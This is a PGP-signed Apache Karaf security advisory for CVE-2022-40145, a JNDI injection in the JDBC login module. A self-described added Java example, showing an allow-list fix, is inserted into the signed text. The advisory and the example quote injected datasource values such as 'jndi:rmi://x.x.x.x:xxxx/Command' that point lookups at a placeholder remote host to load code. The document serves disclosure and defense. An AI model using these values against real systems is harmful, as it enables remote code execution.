-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

CVE-2022-40145: LDAP injection vulnerability in JDBC Login Module with JDK 8

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2

Description:

This vulnerability is a potential code injection when an attacker has control of the target LDAP server used in the JDBC JNDI URL.

The method org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource (in jaas/modules/src/main/java) uses InitialContext.lookup(jndiName) without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE, "jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.

This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI and an attacker has control of the target LDAP server.

This has been fixed in revision:

https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1

Mitigation:

Apache Karaf users should upgrade to 4.3.8 or 4.4.2 or later as soon as possible, or make sure the configured datasource path is a correct, trusted one.
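The following is an added illustration, not Apache Karaf's own code or its actual fix: it shows the unfiltered InitialContext.lookup(jndiName) pattern the advisory describes next to a guarded version that validates the configured datasource string before any JNDI lookup happens. The "osgi:" / "jndi:" prefix convention is taken from the option values quoted above; the class name SafeDatasourceLookup, the allow-list pattern, and the decision to treat "osgi:" values as in-process are assumptions made for this example.

```java
// Added example, not Apache Karaf's own code. Demonstrates filtering a
// configured JDBC datasource name before it reaches InitialContext.lookup.
import java.util.regex.Pattern;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.sql.DataSource;

public final class SafeDatasourceLookup {

    // Constructed allow-list (assumption): a JNDI name may be a plain
    // hierarchical name ("jdbc/karaf") or live in the local "java:" namespace
    // ("java:comp/env/jdbc/karaf"). Anything carrying a provider URL such as
    // "rmi://host:1099/Command" or "ldap://host/cn=x" does not match, so the
    // naming layer can never be pointed at a remote server from configuration.
    private static final Pattern LOCAL_JNDI_NAME =
            Pattern.compile("(java:)?[A-Za-z0-9_./-]+");

    // "Before": the configured value is passed through unfiltered. A value like
    // "rmi://x.x.x.x:xxxx/Command" makes the lookup dereference a remote naming
    // provider, which is the weakness CVE-2022-40145 describes.
    static DataSource lookupUnfiltered(String jndiName) throws NamingException {
        return (DataSource) new InitialContext().lookup(jndiName);
    }

    // "After": the same lookup, guarded by the allow-list.
    static DataSource lookupFiltered(String jndiName) throws NamingException {
        if (!isLocalJndiName(jndiName)) {
            throw new IllegalArgumentException(
                    "refusing JNDI lookup of untrusted name: " + jndiName);
        }
        return (DataSource) new InitialContext().lookup(jndiName);
    }

    static boolean isLocalJndiName(String jndiName) {
        return jndiName != null && LOCAL_JNDI_NAME.matcher(jndiName).matches();
    }

    // Classifies a full datasource option value the way a login module would
    // see it. "osgi:<service>" is assumed here to resolve only in the
    // in-process OSGi service registry, so it is accepted; "jndi:<name>" goes
    // to JNDI, where only local names pass; any other prefix is refused.
    static boolean isAcceptableDatasourceOption(String option) {
        if (option == null) return false;
        if (option.startsWith("osgi:")) {
            return true;
        }
        if (option.startsWith("jndi:")) {
            return isLocalJndiName(option.substring("jndi:".length()));
        }
        return false;
    }

    public static void main(String[] args) {
        String[] samples = {                      // constructed sample values
            "osgi:" + DataSource.class.getName(), // the default quoted in the advisory
            "jndi:java:comp/env/jdbc/karaf",      // a local JNDI name
            "jndi:rmi://x.x.x.x:xxxx/Command",    // the injected value quoted in the advisory
            "jndi:ldap://x.x.x.x/cn=example",     // a remote LDAP provider URL
        };
        for (String s : samples) {
            System.out.println((isAcceptableDatasourceOption(s) ? "accept " : "reject ") + s);
        }
    }
}
```

Run with `java SafeDatasourceLookup.java` on JDK 11 or later; the first two samples are accepted and the two provider URLs are rejected. The point of the allow-list is that a datasource name coming from configuration should never be able to select the naming provider: the check is on the shape of the name (local hierarchical names only), not on a deny-list of known remote schemes, so new or unusual URL schemes are refused by default.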
JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7568

Credit: This issue was discovered and reported by Xun Bai
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEGqjPktQJpzOT0Lc2v/LuQsgoLnYFAmOW/5wACgkQv/LuQsgo
LnaRtBAApAsUA7+zVl03d0pKa7Dd41uec9/voRZ9DSf0byRNdP/NQslAe6ZHEbqz
/2pC3OuYj0yfBOWZ6O0uFb/iDt4+GqAz3mnZqRyDq+hcrdBY5VVxkOU+6uRtQ+Sm
GfkDmMpJDLOURgG/xQa/G8QhOLiBtBErwB5pffMBoxC12HjBPfichM6KJuT55MGR
yvR6CXsPnAlRkyhYPSkI9ehng2BbgnqCHtFQEZwXTViXoyz44/0NZc6URlytsO11
a3/qbkP1p8nvwC5U5D4P/RKRLvN23HZFbFRRms/gNN+L9BKmv8krA3ESnNgi7Kcj
7j+8gRYRzw/g41GuZARC435zCy8PH9ydoHZQnicSmQUpDzBwfCBpRFgiXpq3ztHt
7sLa3rSOVWiJmQiAjQXM1Rr958TrBYRjV2UcTbb0AYEEiZQrAeYHq1M5Y+3pcV9h
NsqEeVkDZji0nu1EoTbxcjIJjMo1G8u3k8VvKMAfrQ37gnCfOnKYYak47cwvZzmu
suatXXUQffi/YR3wercn/1AyCqYmWPbrcvI2b41eDR5JtDX6OMtRdsshCVwjEh9v
k2FSoPCM21+lpbXful4LwIMUppNfwrvn4VXsAsWG4I/g8kxbrFbI0Y/cJHPuCbU2
ABpIBEZGXh8h8TMIimM7EGkKIiF2rlohKsavtgYoi91qrpmca70=
=ozdD
-----END PGP SIGNATURE-----